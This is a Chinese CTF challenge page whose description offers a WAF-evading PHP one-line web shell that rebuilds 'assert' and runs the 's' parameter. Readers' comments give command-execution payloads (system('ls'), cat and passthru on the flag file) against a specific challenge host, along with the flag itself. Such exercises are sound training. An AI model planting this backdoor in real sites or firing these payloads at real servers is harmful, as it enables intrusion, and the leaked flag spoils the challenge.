shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 7921
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
GET-lee 2年前

简单到不敢相信

回复 0

淮南 2年前

环境打不开 退钱!!!

回复 0
whois 1年前

啊哈?

回复 0

淮南 2年前

环境有问题

回复 0

小白菜. 2年前

后悔做之前没看评论区,rnm,退钱

回复 0

falg 2年前

就是一般的命令执行,先拿到index.php然后后面?s=system("ls")查看flaga15808abee46a1d5.txt文件,接着?s=system("cat ./flaga15808abee46a1d5.txt")得到flag

回复 1

bt7274 2年前

assert($_GET['s'])

回复 0

04secbug 2年前

s=system('ls') s=system('cat flag')

回复 1

JJhello 2年前

rnm,退钱

回复 2

wxy1343 2年前

flag{5104494e7b5ec21c02e3d1c5985a4e89}

回复 0

wxy1343 2年前

http://114.67.175.224:11167/index.php?s=passthru(%27cat%20flaga15808abee46a1d5.txt%27)

回复 0

WriteUp

image
harry

3 金币

评分(10)

解题动态

aixuexi666 攻破了该题 34分钟前
57 攻破了该题 2小时前
Thompson 攻破了该题 6小时前
song1997 攻破了该题 6小时前
zzz12311 攻破了该题 8小时前
yonge 攻破了该题 11小时前
ruirui102 攻破了该题 12小时前
祥子1 攻破了该题 12小时前
mixiu 攻破了该题 12小时前
tz001 攻破了该题 13小时前
Seb 攻破了该题 14小时前
迷宫 攻破了该题 14小时前
Cooper.juice 攻破了该题 1天前
SXWM 攻破了该题 1天前
Erec 攻破了该题 1天前
Frenemy 攻破了该题 1天前
hsk_zy 攻破了该题 1天前
谢特恒123 攻破了该题 1天前
admincon 攻破了该题 1天前
muyi111 攻破了该题 1天前
问题反馈